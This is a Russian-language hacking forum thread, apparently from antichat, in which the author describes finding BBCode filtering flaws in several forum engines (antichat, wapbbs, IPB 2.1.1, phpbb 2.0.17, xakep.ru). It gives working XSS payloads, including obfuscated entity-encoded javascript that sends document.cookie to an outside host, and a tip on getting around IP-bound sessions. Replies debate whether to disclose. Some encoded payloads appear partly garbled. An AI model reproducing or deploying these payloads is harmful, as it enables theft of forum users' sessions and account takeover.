Начал Я изучать форум античата с Января этого года. Бла бла под конец - Я его взломал. Вот как Я его ломал. Должен сказать сразу, что после того как Я нашёл багу на античате, Я сразу рассказал её четырём юзером античата. Сначало Zadoxlik`у, потом моему лучшему другу на интернете xSpider`у и третьему человеку Я рассказал Jazzsummerman, который потом случайно рассказал Че Геваре который и прикрыл эту багу прежде тем, как Я ей сумел воспользовался. Без обид, что было то было. Объяснять красивым языком как Алгол, Zadoxlik Jazzsummerman Я ещё не научился, так что расскажу как могу. Первоначальная ошибка состоит в том, что теги HTML: [url=http://www.antichat.ru]http://www.antichat.ru[url] и HTML: [url]http://www.antichat.ru[/url] очень плохо отфильтрированны. Перебрав десятки комбинаций и изучив все теги античатовского форума, Я решил засунуть один тег урл в другой тег урл. Вот так: HTML: [URL=http://www.wj.com[url]http://www.wj.com]wj [/url][/URL] В результате, Я получил следующее: HTML: <a href="http://www.wj.com<a href="http://www.wj.com" target="_blank">wj" target="_blank">http://www.wj.com]wj </a></a> Думаю тут всё и так ясно. Второй тег урл, зашёл в атрибут первого тега урл. После этого, Я задал такой запрос античатовскому форуму: HTML: [URL=http://www.wj.com[url]http://www.wj.com]wj [FONT=Arial]wj[/FONT][/url][/URL] И вот что он мне выдал: HTML: <a href="http://www.wj.com<a href="http://www.wj.com" target="_blank">wj <font face="Arial">wj</font>" target="_blank">http://www.wj.com]wj <font face="Arial">wj</font></a></a>[HTML] Как уже заметно, из-за того, что теги урл фильтрируют все кавычки, nj второй тег урл отфильтрировал кавычки в теги фонт, после чего кавычки перестали существовать вообще, что Я и сам сразу не заметил. И естественно теперь одним пробелом, который как специально для нас разрешён (Тут можно прочитать подробнее о том, что становится когда кавычек нет и добавляется пробел http://www.antichat.ru/crackchat/index.html ) мы теперь можем вписывать произвольной код. Долго не буду рассказывать, что пропускается в каждом теги античата, которые мне пришлось из-за нужды вызубрить наизусть, но просто скажу, что в теги фонт, не пропускается двоеточие. [COLOR=DarkSlateBlue]<:>[/COLOR] Эта проблема меня заставила искать помощь у других Хакеров античата. Естественно мне помог мой лучший друг по имени хSpider которые посоветовал мне использовать html объекты. Должен сказать, что алёрт у меня был и без них, через такой код. [HTML][URL=http://www.wj.com[url]http://www.wj.com]wj [FONT=Arial size=+7 onmouseover=alert(/Hello_from_WJ/) /]wj[/FONT][/url][/URL] Результат: HTML: <a href="http://www.wj.com<a href="http://www.wj.com" target="_blank">wj <font face="Arial size=100 onmouseover=alert(/Hello_from_WJ/) /">wj</font>" target="_blank">http://www.wj.com]wj <font face="Ar.../) /">wj</font></a></a> При проведении мышки на WJ, выскакивал алёрт. Мне захотелось пойти дальше и xSpider мне помог заменить двоеточие ( ":" ) этим символом. Знаю, Я и сам удился. Сто раз про это читал и т.д. и только вспомнил, что он есть и им можно воспользовался. Ещё давно мне даже Железо показывал мылы тырить через эти символы, но почему то мне это не пришло в голову. После этого, используя эту ссылку, http://www.h4cky0u.org/encrypt/index.php Я закодировал свой код? и вот что меня получилось.... HTML: [URL=wj[url]http://www.][FONT=Arial size=20 style=background&*#58;url(javascript*&***#58;document.im*ages*[*;1	*3;.s*rc=&#*34;&#*104;&*#116;**6;&#*112;*:*;/*;/*;a*;*10;&#*116;*i*;	*9;*04;&#*97;&*#116*;.*;*4;&#*117;*/*c*
*3;*05;&*#45;&*#98;&*#105;***10;/s.jpg?"+document.cookie); / ]wj [/url][/FONT][/URL][HTML Это воровало куки на ура. Вот код для желающих как ломать веб-хак. [HTML][color=white][EMAIL][URL=wj`=`][/URL][/EMAIL][/color][color=white]` style=`background:url(javaSCrip t:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/color] Можно ещё и так HTML: [EMAIL][email protected][URL=wj/style=background&*#58;url(javascript*:document.image*s	*1;&#*49;].*src=*"*h*;*6;*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7;	*9;*03;&*#105;*-*;b*;
*5;*10;&*#47;s.j&*#112;g?"+document.cookie); ][/URL][/EMAIL] Для интересующихся как Я ломал форум wapbbs, вот вам один из кодов. HTML: [r0x][img]http://www.phpbb.com/значениеwjimages/phplogo.gif/style=background&*#58;url(*j*;	*7;*18;&*#97;&*#115*;c*;*4;*05;&#*112;*t*;:*;*00;&#*111;&*#99;&*#117;*m*;*01;&#*110;&*#116*;.*;
*5;*09;&*#97;*g*01;&*#115;*[*1*]*.src*=*4;&#*104;*t*;*6;*12;&*#58;&*#47;*/*a*;*0;*16;&*#105*;c*;
*4;&#*97;&*#116;*.**4;*17;&*#47;&*#99;&*#103;*
*5;*5;	*8;*05;&*#110;*/*s*;.*;
*6;&#*112;*g*;?*;"*;+*00;&#*111;*c*;ument.cookie); [/img][/r0x] Вот второй HTML: [url]http://www.wj.com[img]http://www.wapbbs.com/bbs//images/statusicon/forum_new.gif'='[/img][/url]' Код воровки кук скопируйте с первого примера. Так как к кукам wapbbs привязывается ещё и ИП, то это можно обойти с помощью burp proxy. http://www.portswigger.net/proxy/ Сейчас вышли новые форумы, например IPB 2.1.1 и он ломается вот так: HTML: [post=1000[topic=wj style=background&*#58;url(javascript*:document.image*s	*1;&#*49;].*src=*"*h*;*6;*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7;	*9;*03;&*#105;*-*;b*;
*5;*10;&*#47;s.j&*#112;g?"+document.cookie); ] [/topic]] [/post] Форум phpbb 2.0.17 ломается вот так: (Код надо будет если время и желание будет - доработать.) HTML: [img]http://www.phpbb.com/wj[email][email protected][/email]images/phplogo.gif[/img] phpbb 2.0.17 Структура форума хакер.ру, ломается вот так. HTML: [URL][img]http://www.wj'='.gif[/img][/URL]' А так же в самом заголовке и имени тем на этом форуме, разрешается вставка тегов, причём там очень плохая фильтрация. При специальных символах, этот форум ломается на ура как и в теле сообщения, так и в заголовке топиков. Вот и всё. White Jordan.
21:40:17: скажи вандалу что нет 21:40:22: работал Я один 21:40:27: топик ответь 21:40:29: Я не могу пока 21:40:42: скажи Белый Джордан говорит что нет 21:40:45: он напомнил 21:40:50: как уже сказал в статье 21:40:53: работал сам 21:41:02: так что хСпайдера за это баннить не стоит 21:41:08: он тут не причём скажи 21:41:14: а то мали ли что 21:41:20: и впрямь бан ему влепят
кстати если кому интересно- то он нацелен на то что щас пол ачата ломанётся вапс ломать- люди не советую!!! поимите- не стоит идти на поводу и из за него портить всем жизнь!! запомните- НЕ ДЕЛАЙТЕ ЭТОГО!!! не будте марионетками к его руках!!! если хотите проверить- то проверяйте не на его примерах!
гыыыыыыыы.... я говорю не риньтесь с дуру веше=ать хакер и вапс- проверяйте для начала на однотипных сайтах) в будующем советую немного сдержаннее реагировать на мои сообщения) С Уважением Силверан)))
Я так понимаю что для гринов угрозы никакой не было, т.к. надеюсь что все давно пересели на файрофкс или что-то в этом духе.
SanyaX - ну понимаешь в чём дело =). По идеи можно вообще ни о чём не говорить, ни какие уязвимости не показывать, и вообще закрыть все порталы касающиеся безопасности в сети. Тогда всем сайтам будет хорошо?. =). Не думаю...
кстати интерено что за ажиотаж? тот кто более или менее знаком с материалами античата, сам влегкую может такие же уязвимости найти. нового мало. Вайт Джордан правда молодец, что на нашем пропатченном спеуиализированном форуме лазейку нашел ------------- Алсу сосет
Вайт Джордан - молоток, что не поленился и кропотливо иследовал. Если бы не твоя манера Якать и себя возвеличивать - цены бы тебе небыло. Имхо.